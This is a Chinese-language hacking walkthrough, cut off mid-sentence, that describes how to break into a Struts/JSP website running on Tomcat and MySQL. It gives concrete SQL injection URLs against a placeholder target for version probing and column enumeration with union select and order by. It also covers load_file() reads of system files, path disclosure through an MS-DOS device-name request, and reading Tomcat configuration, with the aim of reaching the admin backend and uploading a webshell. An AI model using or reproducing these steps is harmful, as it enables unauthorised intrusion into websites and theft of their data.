入侵基于java Struts的JSP网站
作者：skyfire[B.H.S.T]

入侵要点:

找到注入点
暴露网站页面绝对路径
利用mysql的load_file()读取网站配置信息找到管理后台
上传webshell

了解一下 Struts和.do :

首先了解一下什么是Struts。Struts是Apache基金会Jakarta项目组的一个Open Source项目，是一种优秀的J2EE MVC架构方式，它利用taglib获得可重用代码和抽象 Java 代码，利用ActionServlet配合Struts-config.xml实现对整个系统导航。增强了开发人员对系统的整体把握，提高了系统的可维护性和可扩充性。

Struts的核心是Controller，即ActionServlet,而ActionServlet的核心就是Struts-config.xml，Struts-config.xml集中了所有页面的导航定义。关于sstruts更加详细的内容可以到以下地址浏览：

http://www.cn-java.com/www1/?action-viewnews-itemid-2207
http://www.chinaitlab.com/www/techspecial/struts/
http://www.ibm.com/developerworks/cn/java/j-struts/

.do文件是一个网页后台程序，它实际不是一个文件,并没有一个真正的.do文件存在，它不能直接打开 ，struts使用一个特殊的servlet作为“交换机”，将来自web浏览器的请求转到相应的serverpage。在开发web应用时有一个必须要写的部署描述文件（web-inf/web.xml）。这个文件描述了你的web应用的配置，包括欢迎页面（welcome pages）（当请求没有指定时，出现在目录下的文件）、servlet（路径或者扩展名）和那些servlets的参数的映射。在这个文件中，你配置struts actionservlet作为一个操控所有指定映射（通常以.do为扩展名）请求的servlet——这就是“交换机”。

可以通过下面地址的内容更加清楚的明白.do文件：

http://topic.csdn.net/u/20071009/11/D16FB438-4A2A-47E2-A03A-F62366C8F064.html

访问xx.do页面实际就是访问xx.jsp文件,但是使用了struts技术的网站，直接访问xx.jsp是不会被Tomcat、Resin等web服务器解析的。
xx.do页面目录下必有web-inf文件夹，存放Struts-config.xml！！



下面开始转入主题:

1、打开目标站点，发现是jsp类型网站，页面后缀名称是.do和.jsp，打开页面

http://www.site.com.cn:8081/newslistAction.do?type=1

输入标点 ',根据页面返回的内容，发现网站是基于Apache Tomcat/5.0.28 的web服务器。

2、寻找注入点，打开“产品中心”-“网络防火墙”-打开一种产品的介绍

http://www.site.com.cn:8081/showproAction.do?id=47

试试是否能手工注入，根据对此站点的了解，数据库应该是mysql或者oracle，oracle那种大玩意我们就不敢碰了，先试试看是不是mysql ，

http://www.site.com.cn:8081/showproAction.do?id=47 and ord(mid(version(),1,1))>51

页面正常，说明是mysql，而且mysql的版本是4.0以上，可以使用union查询,下面爆一下字段数：

http://www.site.com.cn:8081/showproAction.do?id=47' and 1=2 union select 1,2/* 页面出错；
http://www.site.com.cn:8081/showproAction.do?id=47' and 1=2 union select 1,2,3/* 页面出错；
.....
http://www.site.com.cn:8081/showproAction.do?id=47'%20and%201=2%20union%20select%201,2,3,4,5,6,7/*

页面正常，而且页面内容显示出我们想要的数字！！


mysql注入爆字段有个技巧，不需要这么麻烦进行猜测，可以利用order by 暴字段数，例如：

http://www.site.com.cn:8081/showproAction.do?id=47' order by 7/* 页面正常；
http://www.site.com.cn:8081/showproAction.do?id=47' order by8/* 页面出错，说明共有7个字段

3、既然知道了是mysql数据库，也找到了注入点，当然是拿出php注入工具，这里使用的是海洋顶端网PHP注射工具，获取数据库的一些信息，更加重要的使用load_file()函数。

对于mysql数据库来说，root用户默认只能在本机登陆，就不要指望使用空密码连接3306端口远程登录mysql数据库。

现在还不知道操作系统是windows还是linux，如果系统没有做用户权限设置，可以用load_file()函数试试，load_file('/etc/password')，load_file('c:\boot.ini')，竟然是windows 2000 Server！看来网站架构应该就是windows 2000 server+tomcat+mysql，不要指望IIS了。

4、.继续注入，看能不能找到网站管理员帐号和密码。拿出近来比较出风头的注入工具pangolin(穿山甲)，输入注入地址

http://www.site.com.cn:8081/showproAction.do?id=47

数据库当然是mysql了，注入字符类型是int型，晕，跑了半天竟然跑不出东西来，数据表也猜测不到东西，看来用工具猜测获得数据库的管理员帐号和密码是不太现实了，再想想其他办法咯。

5、如果知道页面文件在硬盘的绝对路径，当然可以load_file()查看页面源代码，关键是怎么暴露出页面的地址呢？如果是php页面还可以构造一些sql语句导致查询出错而暴露出web页面绝对路径，但现在是tomcat，页面执行出错的时候都是tomcat该死的调试信息霸占住页面。试试啊D注入工具的管理入口搜索，结果发现的只有tomcat的默认管理页面，没有配置过的tomcat管理界面是登陆不了的。继续搜索，无意中打开了

http://www.site.com.cn:8081/manager/
http://www.site.com.cn:8081/jiehe/

可以列目录哦，不过看不到什么有价值的页面地址。

6、试试工具wwwscan，一个支持SSL的命令行CGI扫描器，据说收集了很多敏感的目录文件，终于访问http://www.site.com.cn:8081\\com3的时候，错误页面暴露出来网站的路径:F:\Tomcat 5.0\webapps\ROOT\com3 (系统找不到指定的文件)，那说明tomcat的虚拟目录路径就是

F:\Tomcat 5.0\webapps\ROOT\

绿盟漏洞库（http://www.nsfocus.net/vulndb/9875）是这样描述此漏洞的：
DApache Tomcat MS-DOS设备名远程拒绝服务漏洞：

Apache Tomcat在处理畸形的用户请求时存在漏洞，远程攻击者可以利用这个漏洞对服务程序执行拒绝服务攻击，使合法用户无法正常访问服务。当用户发送MS-DOS设备名加“.jsp”的文件请求到服务器时，会导致服务程序发生拒绝服务。

7、既然知道了网站的虚拟路径，那么剩下的就是利用load_file()看页面代码咯。先试试load_file(“index.php”),可惜看不到什么有价值的信息，那么看看tomcat的配置文件，

F:\Tomcat 5.0\conf\server.xml

如果网站虚拟目录移动到其他路